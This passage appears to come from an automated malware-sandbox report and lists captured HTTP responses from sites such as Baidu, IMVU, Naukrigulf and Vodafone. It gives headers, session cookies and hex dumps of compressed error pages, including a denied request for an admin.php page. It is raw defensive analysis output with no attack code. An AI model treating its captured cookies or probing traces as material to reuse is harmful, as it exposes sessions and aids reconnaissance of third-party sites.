66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/Ta
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveContent-Encoding: gzipContent-Type: text/htmlDate: Mon, 05 Feb 2024 11:14:53 GMTEtag: W/"62650964-3feb"Logid: 8900800306063491885P3p: CP=" OTI DSP COR IVA OUR IND COM "Server: nginxSet-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;Set-Cookie: BAIDUID=A87D8840E6ACB4C43FA6725E63D037D4:FG=1; expires=Tue, 04-Feb-25 11:14:53 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1Vary: Accept-EncodingVary: Accept-EncodingX-Powered-By: BaiduCloudYld: 8900800306063491885Yme: ZIGW/y8rX0gMaTUAUmr/tG1LteUfTQTrqQhFwSCAkA==Transfer-Encoding: chunkedData Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/Ta
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Set-Cookie: osCsid=3d56c00b3a8b97318c69b3bcd402d268; expires=Mon, 04 Mar 2024 11:14:54 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: osCsid=3d56c00b3a8b97318c69b3bcd402d268; expires=Mon, 04 Mar 2024 11:14:54 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=Nonex-imvu-rnd: DL5kI03G4GbOn9bDoAu5aSI5S6j7XuUcontent-language: pt-brContent-Encoding: gzipData Raw: 31 32 34 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 74 b2 93 38 d9 38 c9 f4 20 1b 18 45 b2 28 d1 21 59 0c ab 68 4b ed c9 c7 0c f6 61 30 0b ec d3 60 5f f6 d5 3f b6 e7 14 49 89 94 a8 c4 e9 56 37 d6 84 ac 72 5d ce fd 56 c5 f2 d1 37 67 2f 4e 5f ff f5 e5 39 99 c9 c0 1f 1f 7d a3 eb ef 3c 97 3c 3d 27 83 f7 63 92 ff 1c e1 20 71 bc f8 58 f3 65 ac 11 9f 86 d3 63 8d 85 fa 9b 4b 8d d8 3e 15 e2 58 f3 d8 40 1b 93 a3 6f de b1 d0 f1 dc f7 ba 5e 04 36 fc 6a 60 c3 2d c0 a6 32 83 87 1d e3 6a 58 91 d4 ad 58 ad d7 f5 22 8c bd a3 19 a3 ce 78 4f 51 11 30 49 81 69 19 e9 ec 63 e2 dd 1c 6b 3f e9 6f 26 fa 29 0f 22 2a 3d cb 67 40 0b 0f 25 0b e5 b1 f6 f4 fc 98 39 53 e8 31 b6 ad 3d 4d a7 ea af 17 51 71 a1 64 73 69 20 89 87 c4 9e d1 58 30 79 fc e6 f5 63 7d b0 06 29 a4 01 3b d6 68 14 f9 4c f7 64 12 32 a1 c3 1f 05 38 f0 97 ee 39 c7 c3 f6 f0 a0 b7 3f e8 f5 9a 04 7b 68 3c 4d 02 1c 47 4a c4 c8 30 22 d9 12 cc 4e 62 d6 f2 82 9b a4 65 f3 c0 08 91 82 3f 09 9e c4 36 3b b6 68 18 b2 58 21 2f 22 9e 72 3e 05 cc 91 4f 17 d5 78 01 50 0a 31 e0 96 e7 33 9b c7 0e bf a1 1b 70 52 06 d2 39 fa 2d b3 10 98 6e d3 88 96 a5 b9 60 e2 61 4b 85 a4 32 11 ba 45 63 68 2e 4a 30 2c 9f da 1f 74 19 d3 50 f8 89 0d 5d ff 0f 89 f1 bd f0 03 89 99 9f 03 94 3c b1 67 ba 07 cb 34 22 bc 9f 19 98 f9 fe c1 7c ff 40 23 b3 98 b9 c7 1a 6a 11 94 b8 ae 41 f8 04 3c 34 6e 3d 39 0b 98 e1 05 53 c3 a5 37 08 c5 58 07 ab 2b 70 ad 28 9c 3e 98 80 be 39 ef 9b bb 23 40 81 fb 2a 02 0e 3a f3 83 ce ee 08 50 e0 be 8e 80 fe fc a0 bf 43 02 10 dc 57 11 Data Ascii: 1242;nH#$t88 E(!YhKa0`_?IV7r]V7g/N_9}<<='c qXecK>X@o^6j`-2jXX"xOQ0Iick?o&)"*=g@%9S1=MQqdsi X0yc});hLd289?{h<MGJ0"Nbe?6;hX!/"r>OxP13pR9-n`aK2Ech.J0,tP]<g4"|@#jA<4n=9S7X+p(>9#@*:PCW
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 05 Feb 2024 11:14:13 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:15:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-alivex-zone: 3-ded6941-web19CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 850abbab1dcd6735-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 00 00 ff ff 03 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 73(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 272Expires: Mon, 05 Feb 2024 11:15:07 GMTDate: Mon, 05 Feb 2024 11:15:07 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131707977_1611129006_213767433_15_9066_0_0_-";dur=1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 61 64 6d 69 6e 26 23 34 36 3b 70 68 70 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 37 30 37 26 23 34 36 3b 63 62 64 64 35 30 39 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131707&#46;cbdd509</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:15:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z68UVnYT7amvJkaV8QNmUHQPrE1kIjwMRyjpK57PoYQIZDBEOk6aP7jTmidpCO9l49IgIUG874l1SI3D0qM6UgRVocG8VJc6N33PRsHkyHZnLk65sxCbre7aVKjL8CHamQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abbd6df6c0723-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 36 12 fe ee 5f 31 d1 01 89 0d 58 92 bd 6f 79 93 55 b4 bb 39 20 c0 1e ba ed 66 d1 2e 8a 45 40 91 23 8b 0d 45 ea 48 ca 8a 91 cb 7f 2f 28 4a 8e fc 92 f4 16 77 40 80 88 e2 f0 99 99 87 cf 8c 48 27 47 1f 7e 7e 7f f3 f5 d3 15 14 b6 14 e9 28 39 0a c3 3f 78 0e c2 c2 f5 15 9c 7e 4b 21 71 13 40 05 31 66 11 48 15 fe 69 80 e3 3b 50 82 71 0c 40 10 b9 5c 04 28 c3 2f 9f 83 14 92 a3 3f 50 32 9e 7f 0b c3 27 a8 0e 07 e0 30 d4 e9 f7 41 9d bd 00 75 f6 1d 50 4b db a1 b9 17 87 b2 dc 47 09 c3 6d a4 02 09 4b 47 89 e5 56 60 fa a3 b5 28 2d 57 12 7e c5 7f d7 5c 23 3b 82 ff c0 7b a1 6a 96 0b a2 31 89 bd dd 28 29 d1 12 a0 05 d1 06 ed 22 f8 72 f3 cf f0 2c 80 b8 9f 28 ac ad 42 87 b0 5a 04 ef 95 74 a0 e1 cd ba c2 00 a8 1f 2d 02 8b f7 36 76 f1 5e 6e 60 5e 42 f9 3d fc f2 63 f8 5e 95 15 b1 3c 13 43 a0 eb ab c5 15 5b e2 60 9d 24 25 2e 02 ad 32 65 cd c0 50 2a 2e 19 de 4f 41 aa 5c 09 a1 9a bd 25 2b 8e 4d a5 b4 1d 2c 6a 38 b3 c5 82 e1 8a 53 0c db c1 94 4b 6e 39 11 a1 a1 44 e0 62 ee 51 04 97 77 a0 51 2c 02 63 d7 02 4d 81 68 03 e0 6c 11 d0 fc d6 bf 0a a9 31 01 14 1a f3 45 10 53 26 43 ba e4 b1 9f 8a 69 1e a1 d6 4a 9b a8 35 8a 77 35 7c fe 2d 7d de c5 c9 93 0b 8e ce cb c9 df 7a e1 d8 3b da 56 43 6b 98 66 8a ad 1f 4a a2 97 5c 5e cc 2e 2b c2 18 97 cb 8b d9 63 e2 81 d2 d1 68 a0 40 74 f1 cd 67 9d 06 47 89 a1 9a 57 36 1d 01 f0 1c c6 47 92 ac f8 92 58 a5 23 aa d4 1d c7 2b 49 32 81 6c 02 0f 23 57 02 0d 97 4c 35 11 61 ec 6a 85 d2 7e e4 c6 a2 44 3d 3e f9 f0 f3 bf 3a e5 7c 54 84 21 3b 99 42 5e 4b da 8a 73 dc af 06 58 11 0d 1d b0 80 05 30 45 eb 12 a5 8d 96 68 af 04 ba c7 9f d6 d7 6c 7c e2 6d 42 22 50 db 93 c9 65 b7 ba 5f 19 b5 79 45 8c 9b Data Ascii: 6c8Xmo6_1XoyU9 f.E@#EH/(Jw@H'G~~(9?x~K!q@1fHi;Pq@\(/?P2'0AuPKGmKGV`(-W~\#;{j1()"r,(BZt-6v^n`^B=c^<C[`$%.2eP*.OA\%+M,j8SKn9DbQwQ,cMhl1ES&CiJ5w5|-}z;VCkfJ\^.+ch@tgGW6GX#+I2l#WL5aj~D=>:|T!;B^KsX0Ehl|mB"Pe_yE
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Date: Mon, 05 Feb 2024 11:15:14 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 7
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableRetry-After: 5Content-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeX-Iinfo: 18-7271493-0 NNNN RT(1707131707144 2) q(0 0 -1 -1) r(150 -1) b6 U5Set-Cookie: visid_incap_2490076=kLeaQSZ1RB6mANP3fttPzErDwGUAAAAAQUIPAAAAAAC8rGzozAqaKHOHbzumengl; expires=Mon, 03 Feb 2025 22:24:35 GMT; HttpOnly; path=/; Domain=.vodafone.deSet-Cookie: incap_ses_9117_2490076=tGTdAjvxwnSj8Hr7LxiGfkrDwGUAAAAAgu2NC6fgHpmbmxBlXbXLHw==; path=/; Domain=.vodafone.deX-CDN: ImpervaContent-Encoding: gzipTransfer-Encoding: chunkedX-Iinfo: 13-6888818-6889272 nNYN RT(1707131705768 2156) q(0 0 0 -1) r(150 150) b6 U22Data Raw: 32 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 53 6d 6f 9b 30 10 fe 2b 96 a5 f0 a9 34 36 af a1 8b 33 65 49 36 51 b5 20 a5 a9 d2 7d aa 1c 73 14 4f 60 28 38 69 f3 ef 67 42 33 a5 d2 b4 8f b3 c4 19 3f f6 73 be 7b ee 3c 2d 74 55 a2 4e 1f 4b 60 b8 00 f9 52 e8 1b 4a c8 08 cf a6 05 f0 6c 36 bd 5f 6d e6 28 99 df af 18 5e a7 df d2 cd 03 46 8b 34 d9 ac 92 0d c3 49 1a 27 cb d5 d3 15 4a d2 ef e9 dd 5d ba 35 ac 0a 34 47 8a 57 c6 5d 5e b7 15 d7 76 06 1a 84 96 b5 c2 48 d4 4a 83 d2 0c 6b 28 a1 29 6a 05 4c d5 9f 49 07 09 6f 4d dd ea 8b c3 52 49 2d 79 69 77 82 9b 28 e9 35 39 33 0a ad 1b 1b 5e f7 f2 c0 f0 93 fd 38 b7 17 75 d5 70 2d 77 25 5c d0 e3 15 83 ec 05 ae 44 d1 d6 e6 06 6a d8 9d 68 65 a3 91 3e 36 d0 c7 f2 ae c7 bf f8 81 0f 28 46 5d 2b 18 1e 3f c7 4a f0 a6 db 97 fc 79 0d 5d bd 6f 05 7c 7d d8 de c6 3f ef b6 73 16 d2 28 73 bd cc a5 62 02 2e 0f 20 c8 f3 3c f3 1c 3f 0f 81 b8 4e ee 9a 3b c6 83 3b f3 33 08 b9 ab b3 e3 59 e8 8a b7 2f 52 dd 90 e6 fd cb 67 cd 65 de 1a 15 90 cc fa 33 52 d9 c3 fa 5f 21 2d b6 8f cb e4 61 1e 33 cf 7a 97 2a af 19 9d d8 a1 13 52 2f 72 6d 32 72 48 62 86 99 d6 9b 91 33 a1 21 09 a9 7b b2 9e 67 40 67 e4 44 66 7a 35 5b fd d1 fe b3 e9 87 e9 37 da 9e e3 93 0b 64 17 18 f3 e8 5b 52 09 99 19 75 9f 4d a4 c4 8e bc 20 8c 48 10 44 01 75 bd 90 d0 c0 b1 c0 54 9d 39 c4 12 a7 98 f2 8f 41 1d 9f 5b 6d 73 c2 42 3f b2 4c 8d 14 37 2e dc 89 e3 91 88 12 ea 59 95 2e d8 8f d5 06 a3 53 e6 bb ba cd a0 65 04 bd c9 cc 6c e0 93 4c 68 d0 ec bc 1a c4 3c 63 46 d3 33 f4 c1 e9 91 d9 da b4 09 74 1a ed 55 b7 17 02 ba 2e df 97 d7 e8 8f 9e e8 9c 10 8a 97 37 e8 6f 19 4d c7 43 2d fe 43 f3 58 aa 63 ae 25 76 46 bf c8 9f 84 3e a1 0e 46 bc 3b 2a 71 